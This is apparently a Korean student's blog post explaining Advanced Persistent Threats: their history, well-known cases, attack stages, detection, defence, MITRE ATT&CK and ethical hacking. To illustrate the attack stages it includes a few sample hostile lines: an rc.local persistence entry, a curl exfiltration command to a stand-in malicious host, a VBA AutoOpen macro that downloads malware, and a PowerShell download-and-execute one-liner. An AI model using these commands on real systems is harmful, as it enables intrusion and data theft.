Advanced Persistent Threat
오늘의 주제는 APT이다. 최근 유행하는 노래와 마침 같은 제목이지만... 안타깝게도 내용은 전혀 연관이 없다. "지능형 지속적 위협" 이라는 무서운 이름을 지닌 이 공격에 대해 알아보자.
APT(Advanced Persistent Threat) 는 고도화된 사이버 공격으로, 특정 대상(조직, 기업, 국가 등)을 장기간에 걸쳐 지속적으로 공격하여 민감한 정보를 탈취하거나 시스템을 장악하는 데 초점을 둔다. "Advanced"는 공격 기법의 정교함을, "Persistent"는 지속성과 끈질김을, "Threat"는 공격자가 의도적으로 목표를 설정하고 수행하는 위협을 의미한다.
APT는 일반적인 사이버 공격과 달리, 표적의 시스템에 침투한 이후에도 오랜 기간 활동을 은밀히 지속한다. 이 과정에서 공격자는 정교한 기술(제로데이 취약점, 맞춤형 악성코드 등)을 활용하며, 탐지를 회피하기 위해 다양한 은닉 기법을 사용한다. 주요 특징으로는 다음이 있다:
APT는 일반적인 사이버 공격과 비교했을 때 목적, 범위, 기술 수준에서 다음과 같은 차이점을 보인다:
특성 | APT 공격 | 일반적인 사이버 공격 |
---|---|---|
목적 | 특정 대상의 민감 정보 탈취, 파괴, 감시 | 금전적 이득(랜섬웨어, 피싱 등) |
기간 | 수개월에서 수년에 이르는 장기적 침투 | 단기간 내에 피해를 발생시키는 일회성 공격 |
기술 수준 | 제로데이 취약점, 맞춤형 악성코드 등 정교한 기술 활용 | 알려진 취약점이나 자동화된 도구를 사용하는 경우 |
대상 | 정부, 대기업, 중요 기반시설 | 개인 사용자, 중소기업 등 |
탐지 난이도 | 탐지와 대응이 매우 어려움 | 상대적으로 탐지와 차단이 용이함 |
APT는 공격자가 특정 목표에 대해 심도 있는 사전 조사를 바탕으로 공격을 준비하며, 이를 통해 성공 가능성을 극대화한다. 예를 들어, 피싱 메일조차 특정 조직 내 환경에 맞춘 정교한 사회공학 기법을 동반한다.
APT는 2000년대 초반부터 언급되기 시작했으며, 시간이 지날수록 더욱 정교하고 위험한 형태로 진화했다.
APT라는 용어는 2006년 미국 공군에서 처음 사용되었으며, 조직화된 해커 그룹과 국가 주도의 공격을 설명하기 위해 도입되었다. APT는 초기에는 주로 국가 간 스파이 활동에서 사용되었지만, 현재는 대기업, 금융기관, 중요 인프라를 표적으로 삼는 경우도 많다. 또한 APT는 매년 더 정교하고 치명적인 방식으로 진화하며, 단순한 기술적 위협을 넘어 국가 안보, 경제적 안정성에 심각한 영향을 미치고 있다.
Stuxnet은 이란의 핵시설을 표적으로 한 APT 공격으로, 사이버 공격이 물리적 설비에 미칠 수 있는 영향을 보여준 최초의 사례다. 이 공격은 맞춤형 악성코드를 사용하여 이란의 우라늄 농축 설비를 교란했다.
미국 Mandiant 보고서를 통해 밝혀진 APT1은 중국의 해커 그룹으로, 수년간 미국의 대기업과 정부 기관을 표적으로 데이터를 탈취한 사례다.
SolarWinds 소프트웨어 업데이트를 통해 악성코드를 배포한 사례로, 미국 정부 기관과 대기업이 피해를 입었다. 이 공격은 APT의 복잡성과 대규모 영향을 보여준다.
북한과 연계된 것으로 알려진 Lazarus 그룹은 APT 활동으로 전 세계 금융기관과 암호화폐 거래소를 대상으로 공격을 수행하며 수십억 달러의 금전적 손실을 초래했다.
APT 공격은 단순한 일회성 침투가 아니라, 여러 단계를 통해 치밀하게 수행되는 장기적 공격이다. 이 공격 과정은 일반적으로 다음과 같은 단계를 따른다:
공격자는 목표에 대한 정보를 수집하는 단계로, 이를 통해 목표 시스템, 네트워크 구조, 사용자의 행동 패턴 등을 파악한다.
공격자가 목표 시스템에 침투하는 단계로, 주로 취약점이나 사회공학적 기법을 활용한다.
초기 접근 권한을 획득한 후, 공격자는 시스템 내에서 더 높은 수준의 권한을 얻기 위해 권한 상승을 시도한다.
공격자는 내부 네트워크에서 다른 시스템으로 이동하며, 네트워크 전체를 장악하려 한다.
공격자는 민감한 데이터를 검색, 수집, 그리고 외부로 전송한다.
공격을 감추기 위해 로그를 삭제하거나 위조하여 탐지를 방해한다.
APT 공격은 다양한 공격 벡터와 기술을 사용하여 목표에 침투한다. 다음은 주요한 공격 벡터들이다. 물론 이 외에도 내부 직원의 부주의한 행동(USB 드라이브 사용)이나 약한 비밀번호 등의 비기술적 취약점을 악용하는 경우도 많다.
피싱은 공격자가 악성 이메일이나 메시지를 통해 사용자를 속이는 방법이다.
제로데이 공격은 소프트웨어의 알려지지 않은 취약점을 악용하여 시스템에 침투한다.
APT 공격자는 목표를 직접 공격하지 않고, 신뢰할 수 있는 공급업체를 먼저 공격하여 최종 목표에 접근한다.
공격자는 오래된 소프트웨어나 보안 패치가 적용되지 않은 시스템을 대상으로 한다.
APT 공격의 핵심은 공격자가 장기간 동안 탐지되지 않고 지속성을 유지하며, 민감한 데이터를 탈취하는 것이다.
공격자는 침투 이후에도 탐지를 회피하면서 시스템에 계속 머무르기 위해 다음과 같은 기술을 사용한다.
# 악성코드를 자동으로 실행하는 스크립트
echo "/usr/bin/malware" >> /etc/rc.local
뭐 이런 거...?
공격자는 유출한 데이터를 외부로 전송하기 위해 다양한 기술을 사용한다:
curl -X POST -d "data=stolen_data" https://malicious-server.com/upload
이 두 가지 과정을 통해 APT 공격자는 장기간 목표 시스템에 머무르며 지속적으로 데이터를 유출하거나 추가 공격을 준비한다.
APT 공격의 초기 접근 단계에서는 사회공학적 기법이 자주 사용된다. 사회공학(Social Engineering)은 심리적 취약점을 이용하여 사용자가 의도하지 않은 행동(예: 악성코드 실행, 민감한 정보 제공 등)을 하도록 유도하는 기법이다.
APT 공격에서 가장 흔히 사용되는 사회공학 기법은 피싱이다. 공격자는 표적 조직의 내부 환경을 분석한 뒤, 신뢰할 만한 발신자로 위장한 이메일을 보낸다. 이메일에는 악성 첨부 파일(예: Word 문서, PDF)이나 악성 사이트로 연결되는 링크가 포함되어 있다.
APT 공격자는 특정 대상에 대해 신뢰를 쌓기 위해 전화, 소셜 미디어, 물리적 접근을 활용하기도 한다. 예를 들어, 조직 내부자가 USB 드라이브를 시스템에 연결하도록 유도하거나, "기술 지원"을 가장하여 자격 증명을 요구할 수 있다.
APT 공격자는 조직 내부자를 대상으로 회유하거나 협박하여 기밀 정보를 획득하거나, 악성코드 배포를 돕도록 강요한다. 이러한 기법은 보안 정책이 강력한 조직에서 특히 효과적이다.
사회공학적 기법은 주로 기술적 방어 장치를 우회하는 데 사용되므로, 직원 교육과 보안 인식 강화가 매우 중요하다.
APT 공격의 핵심은 표적 시스템에 악성코드와 백도어를 설치하여 지속적으로 접근할 수 있는 경로를 확보하는 것이다.
Sub AutoOpen()
Shell "cmd.exe /c powershell -Command 'Invoke-WebRequest -Uri malicious-url -OutFile malware.exe'"
End Sub
백도어는 공격자가 시스템에 지속적으로 접근할 수 있도록 하는 프로그램이다.
APT 공격자는 탐지되지 않도록 표적 시스템에 최적화된 맞춤형 악성코드를 개발한다. 일반적인 안티바이러스 프로그램에 탐지되지 않으며, 공격의 흔적을 최소화한다.
악성코드와 백도어는 APT 공격의 지속성을 보장하며, 네트워크 내 다른 시스템으로 확장하는 데 중요한 역할을 한다.
파일리스 공격(Fileless Attack) 은 파일 형태의 악성코드를 시스템에 저장하지 않고 메모리 내에서 실행하는 공격 방식이다. APT 공격자들은 파일리스 공격을 통해 탐지 방어 시스템을 회피하고, 빠르게 표적을 장악한다. 또한 파일리스 공격은 탐지가 어렵고 정교한 기술을 필요로 하므로, APT 공격에서 특히 위협적인 요소로 작용한다.
기존의 공격은 악성 파일을 시스템에 저장하여 실행하는 방식이지만, 파일리스 공격은 메모리 내에서 실행되므로 디스크 기반 탐지(안티바이러스, 로그 분석 등)에 포착되지 않는다.
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-url/script.ps1')
APT 공격을 탐지하기 위해서는 정교하고 통합적인 접근 방식이 필요하다. 일반적인 보안 시스템은 APT의 은밀한 활동을 탐지하기 어렵기 때문에, 다음과 같은 고급 탐지 기법들이 활용된다. APT 탐지는 그 중에서도 다양한 보안 계층에서 발생하는 데이터를 통합하고 분석하여 은밀한 공격을 탐지하는 것이 핵심이다.
보안 정보 및 이벤트 관리(SIEM) 시스템을 활용하여 다양한 로그와 이벤트 데이터를 분석한다.
APT 공격자는 외부 서버와 통신하거나 데이터를 유출하기 위해 네트워크를 활용한다. 네트워크 트래픽 분석은 이러한 비정상적인 통신을 탐지하는 데 효과적이다.
기존의 시그니처 기반 탐지 방식으로는 APT의 새로운 기법을 탐지하기 어렵다. 이에 따라, 사용자 및 엔티티 행동 분석(UEBA)을 통해 이상 행동을 식별한다.
APT 방어를 위해서는 단일 방어벽이나 안티바이러스 솔루션만으로는 부족하다. 다양한 보안 전략을 통합하여 다층 방어 체계를 구축해야 한다. 특히 APT 공격은 기술적 / 비기술적 방법 모두를 이용해 이루어지는 공격이기에, 효과적인 방어 전략은 기술, 정책, 인적 요소를 모두 포함하여 다각적인 방어 체계를 구축하는 데 초점을 맞춰야 할 것이다.
제로 트러스트는 "모든 요청을 신뢰하지 않는다"는 원칙을 기반으로, 내부 및 외부 트래픽을 동일하게 검증하는 보안 모델이다.
다층 방어는 공격자의 다양한 접근 시도를 차단하기 위해 여러 보안 솔루션을 결합하여 활용하는 전략이다.
기술적 방어와 더불어, 직원 교육을 통해 사회공학적 공격(예: 피싱)을 예방한다.
APT 공격에 대한 대응은 사후 처리뿐만 아니라, 사전 탐지와 능동적인 대응을 포함하는 것이 좋다.
침해 발생 시 신속하게 대응하기 위해 사전에 계획을 수립하고, 조직 내 대응 절차를 명확히 해야 한다.
위협 헌팅은 침해가 발생하기 전에 능동적으로 네트워크 내에서 잠재적인 위협을 탐지하고 제거하는 과정이다.
APT는 장기적이고 은밀한 위협을 동반하기 때문에, 단순한 침해 대응으로는 부족하다. 위협 헌팅과 같은 능동적인 방어 활동은 APT 공격을 사전에 탐지하고 피해를 최소화하는 데 필수적이다.
APT 공격은 국가 주도나 조직화된 사이버 범죄 집단에 의해 수행되는 경우가 많다. 이들은 특정 목표를 달성하기 위해 고도로 정교한 기법과 도구를 사용하며, 각 그룹은 고유한 특징과 작전 방식을 가지고 있다.
이들 위협 그룹은 표적 맞춤형 공격과 제로데이 취약점을 활용하며, 공격의 지속성과 정교함이 두드러진다. 위협 그룹 분석은 조직이 자신을 보호하기 위해 적의 전략을 이해하고 방어책을 마련하는 데 필수적이다.
MITRE ATT&CK은 APT를 포함한 사이버 공격의 전술과 기술을 체계적으로 정리한 데이터베이스로, 위협 인텔리전스와 보안 대응에서 중요한 역할을 한다.
공격 활동을 ATT&CK 매트릭스에 매핑하여, 현재 조직이 어떤 전술과 기법에 노출되었는지 파악할 수 있다. 예시를 들자면... 공격자가 PowerShell
을 사용하여 권한 상승을 시도하는 경우, Technique T1059.001
에 매핑 가능
ATT&CK 프레임워크를 활용해 조직의 보안 취약점을 분석하고, 전술적 방어 전략을 수립할 수 있다. 예시로, APT28이 Tactic 'Initial Access' 단계에서 Spear Phishing을 사용했다면, EDR 솔루션을 통해 이메일 링크와 첨부 파일을 모니터링해야 한다.
ATT&CK 데이터베이스에는 APT 그룹과 그들의 전술 및 기법이 기록되어 있어, 조직에 대한 맞춤형 방어 계획을 수립할 수 있다.
위협 인텔리전스는 APT와 같은 고도화된 위협을 탐지하고 방어하기 위해 필수적이다. 이를 통해 조직은 최신 공격 트렌드와 위협 그룹의 활동을 이해하고, 사전에 대응할 수 있다. 또한 위협 인텔리전스를 효과적으로 활용하면 APT 공격을 탐지하고 방어할 수 있을 뿐만 아니라, 조직의 전반적인 보안 태세를 강화할 수 있다.
APT 공격의 가장 주목할 만한 특징 중 하나는 국가 주도 공격에서 주요한 수단으로 활용된다는 점이다. 국가 주도 APT는 특정 국가나 정부 기관이 직접 수행하거나, 국가의 후원을 받은 해커 그룹에 의해 수행된다. 이러한 공격은 경제적 스파이 활동, 군사 기밀 탈취, 정치적 혼란 조장, 그리고 물리적 기반시설의 교란을 목적으로 한다. 물론 국가 주도 APT의 대응은 개별 기업을 넘어 국가 차원의 사이버 보안 전략 및 국제적 협력이 필요할 것이다.
APT 공격은 종종 대규모 개인정보 유출로 이어지며, 이는 GDPR(General Data Protection Regulation)과 HIPAA(Health Insurance Portability and Accountability Act)와 같은 데이터 보호 법규와 밀접한 관련이 있다. 즉, APT 공격은 단순한 기술적 위협을 넘어 데이터 보호와 관련된 법적 문제를 야기하며, 규제 준수의 중요성을 더욱 부각시킨다.
APT 공격자는 주로 민감한 개인정보(Personal Identifiable Information, PII), 금융 데이터, 의료 기록 등을 목표로 한다. 데이터 유출이 발생할 경우, 공격 대상 기업이나 조직은 관련 법규에 따라 심각한 법적, 금전적 제재를 받을 수 있다.
조직은 다음과 같은 조치를 통해 법적 책임을 최소화할 수 있다:
윤리적 해커(Ethical Hacker)는 조직의 시스템에 침투 테스트를 수행하여 취약점을 식별하고 이를 개선하는 역할을 한다. APT 대응에서도 윤리적 해커는 중요한 역할을 맡고 있다. 조금 구체적으로 말해보자면, 윤리적 해커는 보안 태세를 강화하고 APT 공격에 대한 조직의 방어력을 평가하며, 실질적인 보안 개선책을 제공하는 데 중요한 역할을 한다.
윤리적 해커는 조직의 네트워크와 애플리케이션에 대한 침투 테스트를 통해 APT 공격자가 악용할 수 있는 취약점을 발견한다.
APT 공격을 모방한 시뮬레이션을 통해, 조직이 얼마나 효과적으로 대응할 수 있는지를 평가한다.
이 과정에서 보안 프로세스의 취약점이 드러나며, 향후 대응 계획을 개선할 수 있다.
윤리적 해커는 네트워크 트래픽과 로그 데이터를 분석하여, 이미 존재하는 위협을 능동적으로 탐지한다. 이는 APT 공격자의 은밀한 활동을 사전에 차단하는 데 유용하다.
한계
- 공격자의 전술과 기법은 지속적으로 진화하므로, 윤리적 해커의 노력만으로 모든 위협을 막을 수는 없다.
- 리소스가 제한된 경우, 조직 전체를 완벽히 테스트하기 어려움.
중요성
- 윤리적 해커는 보안 시스템의 실질적인 취약점을 파악하고, 이를 개선하기 위해 공격적인 사고방식을 적용한다. 이는 APT와 같은 고도화된 위협에 대응하기 위해 필수적이다.
정보보안과 위협헌팅 분야? 방면?에서 언제나 인기 있는 주제라 그런지 정말 조사하고 알아볼 게 많았다. 다만 앞선 주제들과 달리, 아직 경험이나 실력이 미숙해 "체감할 수 있는 지식" 이 적었다는 점이 조금 아쉽다. 물론 SIEM을 이용해 알림을 수신하고 침해 사실에 즉각 대응하는... 그런 건 쉽게 해볼 수 있는 경험이 아니겠지만, 오늘 조사를 통해 더 많은 것들을 경험해보고 싶다는 생각이 들었다.